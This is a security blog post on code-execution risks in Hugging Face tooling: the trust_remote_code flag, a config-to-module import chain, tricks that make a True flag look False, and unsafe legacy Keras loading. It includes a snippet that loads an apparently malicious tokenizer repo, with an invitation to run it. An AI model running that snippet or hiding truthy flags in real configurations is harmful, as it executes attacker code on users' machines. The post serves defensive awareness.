Introduction

GenAI has taken the world by storm. To meet the demand for developing LLM/GenAI technology through open source, various vendors have risen to meet the need to spread this technology.

One well-known platform is Hugging Face – an open-source platform that hosts GenAI models. It is not unlike GitHub in many ways – it’s used for serving content (such as models, datasets and code), version control, issue tracking, discussions and more. It also allows running GenAI-driven apps in online sandboxes. It’s very comprehensive and at this point a mature platform chock full of GenAI content, from text to media.

In this series of blog posts, we’ll explore the various potential risks present in the Hugging Face ecosystem.

Championing brand design don’ts (sorry not sorry, opinions my own)

Hugging Face Toolbox and Its Dangers

Beyond hosting models and associated code, Hugging Face is also a maintainer of multiple libraries for interfacing with all this goodness – libraries for uploading, downloading and executing models on the Hugging Face platform. From a security standpoint, this offers a HUGE attack surface to spread malicious content through. A lot has already been said about that vast attack surface and many things have been tested in the Hugging Face ecosystem, but many legacy vulnerabilities persist, and bad security practices still reign supreme in code and documentation. These can bring an organization to its knees (while being practiced by major vendors!), and known issues are shrugged off because “that’s just the way it is”, while new solutions suffer from their own set of problems.

ReadMe.md? More Like “TrustMe.md”

The crux of all potentially dangerous behavior around marketplaces and repositories is trust – trusting the content’s host, trusting the content’s maintainer and trusting that no one is going to pwn either. This is also why environments that allow obscuring malicious code or ways to execute it are often more precarious for defenders.

While downloading things from Hugging Face is trivial, actually using them is finicky, in that there is no one global definitive way to do so, and trying to do it any other way than the one recommended by the vendor will likely end in failure. Figuring out how to use a model always boils down to RTFM – the ReadMe.



But can ReadMe files be trusted? Like all code, there are good and bad practices, and even major vendors fall for the bad ones. For example, Apple actively uses dangerous flags when instructing users on loading their models:

trust_remote_code sounds like a very reasonable flag to set to True

There are many ways to dangerously introduce code into the process, simply because users are bound to trust what the ReadMe presents to them. They can load malicious code or load malicious models in a manner that is both dangerous and very obscure.

Configuration-Based Code Execution Vectors

Let’s start by examining the above configuration in its natural habitat.

Transformers is one of the many tools Hugging Face provides users with, and its purpose is to normalize the process of loading models, tokenizers and more with the likes of AutoModel and AutoTokenizer. It wraps around many of the aforementioned technologies and mostly does a good job of using only secure calls and flags.

However, all of that security goes out the window once code execution is enabled for custom models that load as Python code behind a flag, “trust_remote_code=True”, which allows loading classes for models and tokenizers that require additional code and a custom implementation to run.



While it sounds like a terrible practice that should be rarely used, this flag is commonly set to True. Apple was already mentioned, so here’s a Microsoft example:

Why wouldn’t you trust remote code from Microsoft? What are they going to do, force install Windows 11 on y- uh oh it’s installing Windows 11

Using these configurations with an insecure model could lead to unfortunate results.



Code loads dangerous config → config loads code module → code loads OS command

- Code will attempt to load an AutoModel from a config with the trust_remote_code flag

- Config will then attempt to load a custom model class from “exploit.SomeTokenizer”, which will import “exploit” first and then look for “SomeTokenizer” in that module

- The SomeTokenizer class doesn’t exist, but exploit.py has already been loaded and is executing malicious commands
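The chain above relies on ordinary Python import behavior: a module's top-level code runs as soon as the module is imported, before any class lookup happens. The following is a minimal, harmless sketch of that mechanism only, not of the Transformers loader itself. The module name `exploit_demo`, the helper `load_class` and the `SIDE_EFFECTS` list are hypothetical names introduced for illustration.

```python
import importlib
import sys
import tempfile
from pathlib import Path

# Hypothetical stand-in for a repo's exploit.py. The top-level statements run
# at import time, before anyone looks up a class inside the module.
MODULE_SOURCE = '''
SIDE_EFFECTS = []
SIDE_EFFECTS.append("top-level code ran")  # a real payload would sit here
'''


def load_class(module_dir, reference):
    """Resolve a "module.ClassName" reference the way a dynamic loader might."""
    module_name, class_name = reference.rsplit(".", 1)
    sys.path.insert(0, module_dir)
    try:
        importlib.invalidate_caches()
        module = importlib.import_module(module_name)  # executes the module body
    finally:
        sys.path.remove(module_dir)
    # The class lookup can only fail AFTER the module body has already run.
    return module, getattr(module, class_name, None)


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "exploit_demo.py").write_text(MODULE_SOURCE)
        module, cls = load_class(tmp, "exploit_demo.SomeTokenizer")
        return module.SIDE_EFFECTS, cls


if __name__ == "__main__":
    side_effects, cls = demo()
    print(side_effects)  # the module body ran
    print(cls)           # yet the requested class was never found
```

The missing class produces nothing more than a failed lookup, by which point whatever the module body does has already happened.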



This works for auto-models and auto-tokenizers, and in Transformers pipelines:

In this case the model is valid, but the tokenizer is evil. Even easier to hide behind!

Essentially this paves the way to malicious configurations – ones that seem secure but aren’t. There are many ways to hide a True flag looking like a False flag in plain sight:

- {False} is truthy – it’s a non-empty set

- “False” is truthy – it’s a non-empty str

- False < 1 – is True, just squeeze it to the side:

This flag is set as trust_remote_code=False………………………………………………………………………………………………n’t

While these are general parlor tricks to hide True statements that are absolutely not exclusive to any of the code we’ve discussed, hiding a dangerous flag in plain sight is still rather simple. However, the terrible practice by major vendors of making this flag popular and expected means such trickery might not even be required – it can simply be set to True.

Of course, this whole thing can be hosted on Hugging Face – models are uploaded to repos in profiles. Providing the name of the profile and repo will automatically download and unpack the model, only to load arbitrary code.
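These tricks can be checked directly in plain Python, since they depend only on how the language evaluates truthiness. The sketch below assumes nothing about Transformers internals. The guard `require_explicit_false` is a hypothetical helper a reviewer might use, not part of any library.

```python
def looks_false_but_is_truthy():
    """Evaluate values that read like False at a glance but behave as True."""
    candidates = {
        "{False}": {False},      # a non-empty set
        '"False"': "False",      # a non-empty string
        "False < 1": False < 1,  # False compares as 0, and 0 < 1
    }
    return {label: bool(value) for label, value in candidates.items()}


def require_explicit_false(flag):
    """Hypothetical guard: accept only the literal bool False, nothing truthy or falsy-ish."""
    if flag is not False:
        raise ValueError(f"refusing flag value {flag!r}; expected the literal False")
    return flag


if __name__ == "__main__":
    for label, truthy in looks_false_but_is_truthy().items():
        print(f"{label} -> {truthy}")
```

An identity check (`is not False`) is used instead of a truthiness check so that look-alike values such as the string "False" are rejected instead of silently accepted.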

import transformers

yit = transformers.AutoTokenizer.from_pretrained("dortucx/unkindtokenizer", trust_remote_code=True)

print(yit)

Go on, try it. You know you want to. What’s the worst that can happen? Probably nothing. Right? Nothing whatsoever.

Harmful Coding Practices in ReadMes

Copy-pasting from ReadMes isn’t just dangerous because they contain configurations in their code, though – ReadMes contain actual code snippets (or whole scripts) to download and run models.

We will discuss many examples of malicious model loading code in subsequent write-ups, but to illustrate the point let’s examine the huggingface_hub library, a Hugging Face client. The hub has various methods for loading models automatically from the online hub, such as “huggingface_hub.from_pretrained_keras”. Google uses it in some of its models:

And if it’s good enough for Google, it’s good enough for everybody!

But this exact method also supports dangerous legacy protocols that can execute arbitrary code. For example, here’s a model that’s loaded using the very same method with the huggingface_hub client and that runs a whoami command:

A TensorFlow model executing a “whoami” command, as one expects!

Conclusions

The Hugging Face ecosystem, like all marketplaces and open-source providers, suffers from issues of trust, and like many of its peers has a variety of blind spots, weaknesses and practices that empower attackers to easily obscure malicious activity.

There are many things to be aware of. For example, if you see the trust_remote_code flag being set to True, tread carefully. Validate the code referenced by the auto configuration.

Another always-true recommendation is to simply avoid untrusted vendors and models. A model configured incorrectly from a trusted vendor is only trustworthy until that vendor’s account is compromised, but any model from any untrusted vendor is always highly suspect.

As a broader but more thorough methodology, however, a user who wants to securely rely on Hugging Face as a provider should be aware of many things – hidden evals, unsafe model loading frameworks, hidden importers, fishy configuration and many, many more. It’s why one should read the rest of these write-ups on the matter.
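One way to start that validation is to list which code a configuration points at before loading anything. The sketch below is a rough illustration, assuming the custom classes are declared under an `auto_map` key in the repo's JSON config, as is common for custom Transformers models. The function name `referenced_code` and the sample config are hypothetical.

```python
import json


def referenced_code(config_text):
    """Return (auto class, "module.Class") pairs listed under "auto_map", if any."""
    config = json.loads(config_text)
    references = []
    for auto_class, target in config.get("auto_map", {}).items():
        # A target may be a single string or a list with null placeholders.
        targets = target if isinstance(target, list) else [target]
        for item in targets:
            if item:
                references.append((auto_class, item))
    return references


# Hypothetical config mirroring the "exploit.SomeTokenizer" example.
SAMPLE_CONFIG = (
    '{"model_type": "demo", '
    '"auto_map": {"AutoTokenizer": ["exploit.SomeTokenizer", null]}}'
)

if __name__ == "__main__":
    for auto_class, target in referenced_code(SAMPLE_CONFIG):
        print(f"{auto_class} would import code from: {target}")
```

Any reference returned here names a Python file in the repo that deserves a manual read before trust_remote_code is ever enabled. An empty result only means this one key is absent, not that the repo is safe.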

On The Next Episode…

Now that we’ve discussed the very basics of setting up a model – we’ve got exploit deep-dives, we’ve got scanner bypasses, and we’ve also got more exploits. Stay tuned.